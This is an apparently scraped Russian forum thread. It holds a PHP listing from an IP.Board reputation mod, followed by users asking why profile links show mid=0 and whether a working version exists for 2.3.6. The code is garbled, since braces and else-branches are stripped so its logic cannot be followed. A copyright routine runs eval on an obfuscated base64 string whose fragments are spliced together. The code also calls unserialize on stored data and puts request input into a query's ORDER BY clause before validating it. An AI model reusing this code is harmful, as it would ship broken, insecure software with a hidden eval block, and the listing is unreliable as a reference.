                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Page_end();

                $back = "javascript:history.go(-1)";

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowFooter($back);

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Links( $links, $new );

                $this->nav        = array( $this->ipsclass->lang['bnav'] );
                $this->page_title = $this->ipsclass->lang['btitle'];

        // Get new reputation changes

        function getnew()
                $sort_key = array( 'name'     => 'sort_by_name',
                                   'rep'      => 'sort_by_rep',
                                   'times'    => 'sort_by_rep_changes',

                $max_results = array( 10  => '10',
                                      20  => '20',
                                      30  => '30',
                                      40  => '40',
                                      50  => '50',

                $sort_order = array( 'desc' => 'descending_order',
                                     'asc'  => 'ascending_order',

                if ($this->ipsclass->member['g_mem_info'] != 1)
                        $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'no_permission' ) );

                if (isset($this->ipsclass->input['max_results']))
                        $this->max_results = intval($this->ipsclass->input['max_results']);
                        $this->max_results = 30;

                if (isset($this->ipsclass->input['st']))
                        $this->first       = intval($this->ipsclass->input['st']);
                        $this->first = 0;

                if (isset($this->ipsclass->input['sort_key']))
                        $this->sort_key    = $this->ipsclass->input['sort_key'];
                        $this->sort_key    = 'rep';

                if (isset($this->ipsclass->input['sort_order']))
                        $this->sort_order  = $this->ipsclass->input['sort_order'];
                        $this->sort_order  = 'desc';

                $sort_key_html    = "<select name='sort_key' class='forminput'>\n";
                $max_results_html = "<select name='max_results' class='forminput'>\n";
                $sort_order_html  = "<select name='sort_order' class='forminput'>\n";

                foreach ($sort_order as $k => $v)
                        $sort_order_html .= $k == $this->sort_order ? "<option value='$k' selected>" . $this->ipsclass->lang[ $sort_order[ $k ] ] . "\n"
                                                                                                                : "<option value='$k'>"          . $this->ipsclass->lang[ $sort_order[ $k ] ] . "\n";

                foreach ($sort_key as $k => $v)
                        $sort_key_html .= $k == $this->sort_key ? "<option value='$k' selected>"     . $this->ipsclass->lang[ $sort_key[ $k ] ] . "\n"
                                                                                                        : "<option value='$k'>"              . $this->ipsclass->lang[ $sort_key[ $k ] ] . "\n";

                foreach ($max_results as $k => $v)
                        $max_results_html .= $k == $this->max_results ? "<option value='$k' selected>". $max_results[ $k ] . "\n"
                                                                                                                  : "<option value='$k'>"         . $max_results[ $k ] . "\n";

                $this->ipsclass->lang['sorting_text'] = preg_replace( "/<#SORT_KEY#>/"    , $sort_key_html."</select>"   , $this->ipsclass->lang['sorting_text'] );
                $this->ipsclass->lang['sorting_text'] = preg_replace( "/<#SORT_ORDER#>/"  , $sort_order_html."</select>" , $this->ipsclass->lang['sorting_text'] );
                $this->ipsclass->lang['sorting_text'] = preg_replace( "/<#MAX_RESULTS#>/" , $max_results_html."</select>", $this->ipsclass->lang['sorting_text'] );

                $error = 0;

                if (! isset($sort_key[ $this->sort_key ]) )       $error = 1;
                if (! isset($sort_order[ $this->sort_order ]) )   $error = 1;
                if (! isset($max_results[ $this->max_results ]) ) $error = 1;

                if ($error == 1 )
                        $this->ipsclass->Error( array( LEVEL=> 5, MSG =>'incorrect_use') );

                $new = "<a href='{$this->base_url}autocom=reputation&amp;CODE=totals'>{$this->ipsclass->lang['totals']}</a>";
                $links = "";

                $this->output = $this->ipsclass->compiled_templates['skin_ahreputation']->Links( $links, $new );

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->StatsLinks($this->ipsclass->lang['ntitle']);

                $this->ipsclass->DB->simple_construct( array( 'select' => 'r.*, m.name, m.posts, m.mgroup, m.rep as rep_amount, m.title as m_title',
                                              'from'   => 'reputation r, ibf_members m',
                                              'where'  => "m.id=r.member_id AND msg_date > ".$this->ipsclass->member['last_visit']."",
                                              'order'  => $this->sort_key." ".$this->sort_order,
                                              'limit'  => array($this->first,$this->max_results)
                                                         )                );


                if (! $this->ipsclass->DB->get_num_rows() )
                        $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowNone();
                        $new_reps = array();

                        while ( $row = $this->ipsclass->DB->fetch_row() )
                                /* if (!empty($row['name']))      */ $new_reps[ $row['member_id'] ]['name'] = $row['name'];
                                /* if (!empty($row['member_id'])) */ $new_reps[ $row['member_id'] ]['id']   = $row['member_id'];

                                if ($row['CODE'] == '01')
                                        $new_reps[ $row['member_id'] ]['up'] ++ ;
                                        $new_reps[ $row['member_id'] ]['down'] ++ ;

                                $new_reps[ $row['from_id'] ]['times'] ++ ;

                                $new_reps[ $row['member_id'] ]['mgroup']      = $row['mgroup'];
                                $new_reps[ $row['member_id'] ]['rep_amount']  = $row['rep_amount'];
                                $new_reps[ $row['member_id'] ]['posts']       = $row['posts'];
                                $new_reps[ $row['member_id'] ]['m_title']     = $row['m_title'];


                        foreach ($new_reps as $member)
                                if (!$member['name']) continue;

                                $member['name'] = "<a href='{$this->base_url}showuser={$member['id']}'><b>{$member['name']}</b></a>" ;

                                if ($member['up']) $member['rep'] = "+".$member['up'];

                                if ($member['down'])
                                        if ($member['up']) $member['rep'] .= " | ";

                                        $member['rep'] .= "-".$member['down'];

                                $member += $this->build_ranks( $member );

                                $member['group'] = $this->ipsclass->cache['group_cache'][$member['mgroup']]['g_title'];

                                if (empty($member['rep'])) $member['rep'] = $this->ipsclass->lang['no_changes'];
                                else $member['rep'] .= " ".$this->ipsclass->lang['rep_postfix'].
                                                                           " <a href='{$this->base_url}autocom=reputation&CODE=03&mid={$member['id']}'>{$this->ipsclass->lang['details']}</a>";

                                if (empty($member['times'])) $member['times'] = $this->ipsclass->lang['no_changes'];
                                else $member['times'] .= " ".$this->ipsclass->lang['rep_postfix'].
                                                                                 " <a href='{$this->base_url}autocom=reputation&amp;CODE=04&amp;mid={$member['id']}'>{$this->ipsclass->lang['details']}</a>";

                                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowTotalsRow($member);

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Page_end( 'getnew' );

                $back = "javascript:history.go(-1)";

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowFooter($back);

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Links( $links, $new );

                $this->nav        = array( $this->ipsclass->lang['nnav'] );
                $this->page_title = $this->ipsclass->lang['ntitle'];

        // Save reputation post to db (on editing)

        function save_post()
                $this->ipsclass->input['pid'] = intval($this->ipsclass->input['pid']);

                if (!$this->ipsclass->input['pid'])
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'missing_files') );

                $i = $this->ipsclass->DB->simple_exec_query ( array ( 'select' => 'member_id, from_id', 'from' => 'reputation', 'where' => 'msg_id = '.$this->ipsclass->input['pid'] ) );

                if ( ($this->ipsclass->member['id'] != $i['from_id']) and (!$this->ipsclass->member['g_access_cp']) )
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'incorrect_use') );

                // Do not raise an error, just cut... hehe...

                if ($this->ipsclass->vars['rep_msg_length']) $this->ipsclass->input['Post'] = substr($this->ipsclass->input['Post'], 0, $this->ipsclass->vars['rep_msg_length']);

				$this->postlib->parser->parse_html    = 0;
				$this->postlib->parser->parse_smilies = $this->ipsclass->vars['rep_enable_emo'];
				$this->postlib->parser->parse_bbcode  = $this->ipsclass->vars['rep_enable_ibc'];

				$post = $this->postlib->han_editor->process_raw_post( 'Post' );
				$message = $this->postlib->parser->pre_db_parse( $post );

                if ($message != '')
                    $this->ipsclass->DB->do_update( 'reputation', array ( 'message' => $message ), "msg_id='".$this->ipsclass->input['pid']."'" );

                $this->ipsclass->print->redirect_screen($this->ipsclass->lang['edit_success'], "autocom=reputation&CODE=03&mid=".$i['member_id'] );

        // Add or edit comment

        function edit_comment()
                if ($this->ipsclass->vars['rep_allow_comments'] != 1)
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'missing_files') );

                $this->ipsclass->input['id'] = intval($this->ipsclass->input['id']);

                if (!$this->ipsclass->input['id'])
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'missing_files') );

                $i = $this->ipsclass->DB->simple_exec_query( array( 'select' => 'r.*, m.name as author',
                                                    'from'   => 'reputation r, ibf_members m',
                                                    'where'  => "msg_id={$this->ipsclass->input['id']} AND r.from_id=m.id"
                                           )                );

                if ($this->ipsclass->member['id'] != $i['member_id'])
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'incorrect_use') );

                $this->ipsclass->load_words($this->ipsclass->lang, 'lang_post', $this->ipsclass->lang_id);

                // It's serialized, you remember

                $msg = unserialize(stripslashes($i['comment']));
                $i['date']    = $this->ipsclass->get_date($i['msg_date'], 'LONG');

                                if ( ! $i['vis'] and ! $this->ipsclass->member['g_access_cp'] )
                        if ($i['CODE'] == '01' and $this->ipsclass->vars['rep_good_anon'])
                            $i['author'] = "{$this->ipsclass->vars['rep_good_anon']}";
                        else if ($i['author'] == '02' and $this->ipsclass->vars['rep_bad_anon'])
                            $i['author'] = "{$this->ipsclass->vars['rep_bad_anon']}";
                                $i['author'] = "{$this->ipsclass->lang['is_anon']}";
					if ( $this->postlib->han_editor->method == 'rte' )
						$text = $this->postlib->parser->convert_ipb_html_to_html( $this->ipsclass->my_nl2br( $msg['content'] ) );					}
						$this->postlib->parser->parse_html = 1;
						$text = $this->postlib->parser->pre_edit_parse( $this->ipsclass->txt_stripslashes( $msg['content'] ) );
               		$this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->edit_comment( $this->postlib->han_editor->show_editor( $text, 'Comment' ), $i );

//                $this->output = preg_replace( "/<!--IBF.REPLY_JS-->/", $this->ipsclass->compiled_templates['skin_post']->get_javascript(), $this->output );
//                $this->output = preg_replace( "/<!--IBF.REPLY_BOX-->/", $this->ipsclass->compiled_templates['skin_post']->postbox_buttons($i['comment']), $this->output );

                $this->output = preg_replace( "/<!--IBF.HTML-->/", $this->ipsclass->lang['html_off'], $this->output );

                $this->nav        = array( $this->ipsclass->lang['do_comment'] );
                $this->page_title = $this->ipsclass->lang['do_comment'];

        // Save comment to db

        function save_comment()
                if ($this->ipsclass->vars['rep_allow_comments'] != 1)
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'missing_files') );

                $this->ipsclass->input['id'] = intval($this->ipsclass->input['id']);

                if (!$this->ipsclass->input['id'])
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'missing_files') );

                $i = $this->ipsclass->DB->simple_exec_query( array( 'select' => '*',
                                                    'from'   => 'reputation',
                                                    'where'  => "msg_id={$this->ipsclass->input['id']}"
                                                                        )                );

                if ($this->ipsclass->member['id'] != $i['member_id'])
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'incorrect_use') );

				$this->postlib->parser->parse_html    = 0;
				$this->postlib->parser->parse_smilies = $this->ipsclass->vars['rep_enable_emo'];
				$this->postlib->parser->parse_bbcode  = $this->ipsclass->vars['rep_enable_ibc'];

				$post = $this->postlib->han_editor->process_raw_post( 'Comment' );
				$message2 = $this->postlib->parser->pre_db_parse( $post );
				$message3 = trim($message2);

                // I'ma cereal killa, lol

                if ($post != '')
                        $message['author_id']   = $this->ipsclass->member['id'];
                        $message['author_name'] = $this->ipsclass->member['name'];
                        $message['content']     = $message3;
                        $message['date']        = time();
                        $msg                    = serialize($message);

                $this->ipsclass->DB->do_update( 'reputation', array ( 'comment' => $msg ), "msg_id='".$this->ipsclass->input['id']."'" );

                $this->ipsclass->print->redirect_screen($this->ipsclass->lang['comment_success'], "autocom=reputation&CODE=03&mid=".$i['member_id'] );

        // ------------------
        // Utility Functions
        // ------------------

        function update_rep($new, $memid)
                $this->ipsclass->DB->simple_exec_query( array( 'update' => 'members',
                                               'set'    => "rep=".$new,
                                               'where'  => "id=".$memid
                                      )      );


        function get_rep($memid)
                $info = $this->ipsclass->DB->simple_exec_query( array( 'select' => 'rep',
                                                       'from'   => 'members',
                                                       'where'  => "id=$memid"
                                                )                );
                return $info['rep'];

        // HTML: add smilie box.
        // ------------------
        // Inserts the clickable smilies box

        function html_add_smilie_box($in_html="")
                $show_table = 0;
                $count      = 0;
                $smilies    = "<tr align='center'>\n";

                // Get the smilies from the DB

                if ( ! is_array( $this->ipsclass->cache['emoticons'] ) )
                        $this->ipsclass->cache['emoticons'] = array();

                        $this->ipsclass->DB->simple_construct( array( 'select' => 'typed,image,clickable,emo_set', 'from' => 'emoticons' ) );

                        while ( $r = $this->ipsclass->DB->fetch_row() )
                                $this->ipsclass->cache['emoticons'][] = $r;

                usort( $this->ipsclass->cache['emoticons'] , array( 'reputation', 'smilie_alpha_sort' ) );

                foreach( $this->ipsclass->cache['emoticons'] as $a_id => $elmo )
                        if ( $elmo['emo_set'] != $this->ipsclass->skin['_emodir'] )

                        if ( ! $elmo['clickable'] )


                        $smilies .= "<td><a href='javascript:emoticon(\"{$elmo['typed']}\")'><img src=\"".$this->ipsclass->vars['EMOTICONS_URL']."/".$elmo['image']."\" alt=\"".$elmo['typed']."\" border='0' /></a></td>\n";

                        if ($count == $this->ipsclass->vars['emo_per_row'])
                                $smilies .= "</tr>\n\n<tr align='center'>";
                                $count = 0;

                if ($count != $this->ipsclass->vars['emo_per_row'])
                        for ($i = $count ; $i < $this->ipsclass->vars['emo_per_row'] ; ++$i)
                                $smilies .= "<td>&nbsp;</td>\n";
                        $smilies .= "</tr>";

//                $table = $this->ipsclass->compiled_templates['skin_post']->smilie_table();

  //              if ($show_table != 0)
  //            {
  //                      $table   = preg_replace( "/<!--THE SMILIES-->/", $smilies, $table );
  //                      $in_html = preg_replace( "/<!--SMILIE TABLE-->/", $table, $in_html );
  //              }

                return $in_html;

        // Some custom sorts we need

        function smilie_alpha_sort($a, $b)
                return strcmp( $a['typed'], $b['typed'] );

        function reverse_order_sort($a, $b)
                if ($a == $b) return 0;
                if ($a * $b <= 0)
                        return ($a > $b) ? -1 : 1;
                else if ( $a >= 0 and $b >= 0 )
                        return ($a > $b) ? -1 : 1;
                else if ( $a < 0 and $b < 0 )
                        return ($a < $b) ? -1 : 1;

        function rep_sort_special($a, $b)
                if ($a['AMOUNT'] == $b['AMOUNT']) return 0;
                if ($a['AMOUNT'] * $b['AMOUNT'] <= 0)
                        return ($a['AMOUNT'] > $b['AMOUNT']) ? -1 : 1;
                else if ( $a['AMOUNT'] >= 0 and $b['AMOUNT'] >= 0 )
                        return ($a['AMOUNT'] > $b['AMOUNT']) ? -1 : 1;
                else if ( $a['AMOUNT'] < 0 and $b['AMOUNT'] < 0 )
                        return ($a['AMOUNT'] < $b['AMOUNT']) ? -1 : 1;
	// v5.x.x feautres *5.0.0 ALPHA 1* - AH Modding
	# Topic View #
	function topicrep()
	# New XML/AJAX view #
	function ajax_add()
	function xml_add_build_tabs()
		$this->ipsclass->input['tab'] = $this->ipsclass->input['tab'] ? $this->ipsclass->input['tab'] : 'info';
		$onoff['add']   = 'taboff';
		$onoff['member'] = 'taboff';
		$onoff[ $this->ipsclass->input['tab'] ] = 'tabon';
		return $this->ipsclass->compiled_templates['skin_ahreputation']->xml_tabs( $onoff );
	function xml_add_member()
		$this->output = $this->ipsclass->compiled_templates['skin_ahreputation']->xml_add_member();
	* Copyright
	* @desc Removing this without purchasing copyright removal is
	*		against the terms you agreed to whilst downloading
	* @since 10001
	function copyright( $vid )
		eval( base64_decode( "CQkkdmVyc2lvbiA9ICggaXNzZXQoICR0aGlzLT5pcHNjbGFzcy0+dmFyc1snaXBiX2Rpc3BsYXlfdmVyc2lvbiddICkgQU5EICR0aGlzLT5pcHNjbGFzcy0+dmFyc1snaXBiX2Rpc3BsYXlfdmVyc2lvbiddICE9IDAgKSA/ICR0aGlzLT5pcHNjbGFzcy0+dmVyc2lvbiA6ICcnOw0KCQkNCiAgICAgICAgJGNvcHlyaWdodCA9ICI8IS0tIENvcHlyaWdodCBJbmZvcm1hdGlvbiAtLT4NCiAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGFsaWduPSdjZW50ZXInIGNsYXNzPSdjb3B5cmlnaHQnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICBbQUgyMl0gUmVwb3J0IE1hbmFnZXIgdnskdmlkfSAmY29weTsgIi5kYXRlKCJZIikuIiZuYnNwOzxhIGhyZWY9J2h0dHA6Ly93d3cuYWhtb2RkaW5nLmhhYmJvLXdpZGUubmV0Lycgc3R5bGU9J3RleHQtZGVjb3JhdGlvbjpub25lJyB0YXJnZXQ9J19ibGFuayc+IEFIIE1vZGRpbmc8L2E+PGJyIC8+XG4iOw0KICAgICAgICANCiAgICAgICAgaWYgKCBUUklBTF9WRVJTSU9OICkNCiAgICAgICAgew0KICAgICAgICAgICAgJGNvcHlyaWdodCAuPSAiICAgICAgICAgICAgICAgICAgICAgICAgICBQb3dlcmVkIEJ5IDxhIGhyZWY9J2h0dHA6Ly93d3cuaW52aXNpb25ib2FyZC5jb20nIHN0eWxlPSd0ZXh0LWRlY29yYXRpb246bm9uZScgdGFyZ2V0PSdfYmxhbmsnPklQLkJvYXJkIHskdmVyc2lvbn08L2E+DQogICAgICAgICAgICAgICAgICAgICAgICAgICZjb3B5OyAiLmRhdGUoIlkiKS4iICZuYnNwOzxhIGhyZWY9J2h0dHA6Ly93d3cuaW52aXNp"
						."gJGNvcHlyaWdodCAuPSAiICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2PkxpY2Vuc2VkIHRvOiAiLiAkdGhpcy0+aXBzY2xhc3MtPnZhcnNbJ2lwYl9yZWdfbmFtZSddLiI8L2Rpdj5cbiI7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICRjb3B5cmlnaHQgLj0gIjwvZGl2PlxuPCEtLSAvIENvcHlyaWdodCAtLT4iOw0KICAgICAgICANCiAgICAgICAgcmV0dXJuICRjb3B5cmlnaHQ7" ) );$copyright = str_replace( '[AH22] Report Manager v', '[AH22] Reputation System ', $copyright );return $copyright;
 	function personal_function_load_member( $member_id=0 )
		// INIT
		$query = '';
		// What do we have?
		if ( is_array( $member_id ) )
			$query = 'm.id IN ('.implode( ',', $member_id ) . ')';
			$query = 'm.id='.intval($member_id);
		// Load member
		$this->ipsclass->DB->build_query( array( 'select'   => 'm.*',
												 'from'     => array( 'members' => 'm' ),
												 'where'    => $query,
												 'add_join' => array( 0 => array( 'select' => 'me.*',
																				  'from'   => array( 'member_extra' => 'me' ),
																				  'where'  => 'me.id=m.id',
																				  'type'   => 'left' ),
																	  1 => array( 'select' => 'pp.*',
																				  'from'   => array( 'profile_portal' => 'pp' ),
																				  'where'  => 'pp.pp_member_id=m.id',
																				  'type'   => 'left' ),
														   			  2 => array( 'select' => 'g.*',
																				  'from'   => array( 'groups' => 'g' ),
																				  'where'  => 'g.g_id=m.mgroup',
																				  'type'   => 'left' ),
																	  3 => array( 'select' => 's.location_1_id, s.location_2_id, s.location_1_type, s.location_2_type, s.running_time, s.location as sesslocation',
																	 			  'from'   => array( 'sessions' => 's' ),
																				  'where'  => "s.member_id=m.id",
																				  'type'   => 'left' ),
																	  4 => array( 'select' => 'pc.*',
																				  'from'   => array( 'pfields_content' => 'pc' ),
																				  'where'  => 'pc.member_id=m.id',
																				  'type'   => 'left' ) ) ) );
		if ( is_array( $member_id ) )
			while( $row = $this->ipsclass->DB->fetch_row() )
				$member[ $row['id'] ] = $row;
			$member = $this->ipsclass->DB->fetch_row();
			$member['pp_setting_count_visitors'] = ( $member['pp_setting_count_visitors'] != 0 ) ? $member['pp_setting_count_visitors'] : 5;
			$member['pp_setting_count_comments'] = ( $member['pp_setting_count_comments'] != 0)  ? $member['pp_setting_count_comments'] : 5;
			$member['pp_setting_count_friends']  = ( $member['pp_setting_count_friends'] != 0 )  ? $member['pp_setting_count_friends']  : 5;
		return $member;


в этом коде что-то не правильно...
В страничке где смотришь кто поднимал репутацию какому-то юзеру, там есть также репутации того кто голосовал...
Вообщем там ссылка не правильно идёт, так и не смог найти... Для просмотра ссылки Войди или Зарегистрируйся

У всех mid=0 где тут ошибка?
{$this->ipsclass->lang['rep_name']}:&nbsp;<a href='{$this->ipsclass->base_url}autocom=reputation&CODE=03&mid={$id}'>{$text}</a>

Ошибка в этой строке, а именно $id заменял всем mid, m_id, member_id, member['id'] и все такое... чем еще можно заменить чтоб решить проблему?
чем еще можно заменить чтоб решить проблему?
Другим модом репы. Этот через задницу написал. Там код невалидный ппц.
Автор сам удалил его откуда смог.
есть рабочий мод под 2.3.6?
поделитесь плиз.
а то что не ставлю - все не пашет.
есть рабочий мод под 2.3.6?
поделитесь плиз.
а то что не ставлю - все не пашет.

Сейчас занят тем же вопрсом - нашли что-то для себя?
Поделитесь пожалуйста ссылкой, если да.
этот мод на какую версию двига ?
У меня тоже напряг с этим модом. Никак не могу добиться, чтобы нормально работала ссылка на страницу, где был получен плюс в репу. IPB 2.3.6
Может кто-нибудь может скинуть работающий кусок исходника...
У меня тоже напряг с этим модом. Никак не могу добиться, чтобы нормально работала ссылка на страницу, где был получен плюс в репу. IPB 2.3.6
Может кто-нибудь может скинуть работающий кусок исходника...

Так эта версия на 2.3.6 не предназначена
Я прав?
В этой теме нельзя размещать новые ответы.